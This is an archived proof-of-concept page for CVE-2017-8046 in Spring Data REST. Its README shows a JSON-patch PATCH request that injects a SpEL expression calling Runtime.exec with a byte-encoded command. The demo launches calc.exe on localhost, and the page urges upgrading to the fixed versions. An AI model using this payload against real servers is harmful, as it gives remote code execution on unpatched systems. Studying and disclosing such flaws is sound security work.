Associated Vulnerability
Description
SPRING DATA REST CVE-2017-8046 DEMO
Readme
# spring data rest CVE-2017-8046 demo test
please UPGRADE spring data rest NOW.
## steps
* 启动本应用
* 创建test instance
```http
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
{
"firstName":"f2"
}
```
* 利用spel注入, 会启动C:\Windows\system32\calc.exe
```http
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]
```
## upgrade to
* Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
* Spring Boot 2.0.0.M4
* Spring Data release train Kay-RC3
spring boot 1.5.7.RELEASE uses `spring data rest 2.6.7`, but 1.4.x is not upgrade spring data rest version.
File Snapshot
[4.0K] /data/pocs/0dc87e9ebeed247599c11374d6c585165d1e3fd8
├── [6.3K] mvnw
├── [4.9K] mvnw.cmd
├── [1.9K] pom.xml
├── [ 978] README.md
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] org
│ │ └── [4.0K] fornever
│ │ └── [4.0K] cve
│ │ ├── [ 946] CVEApplication.java
│ │ ├── [1.5K] EntityPerson.java
│ │ └── [ 193] PersonRepository.java
│ └── [4.0K] resources
│ └── [ 0] application.yml
└── [4.0K] test
└── [4.0K] java
└── [4.0K] org
└── [4.0K] fornever
└── [4.0K] cve
└── [ 330] CVEApplicationTests.java
12 directories, 9 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.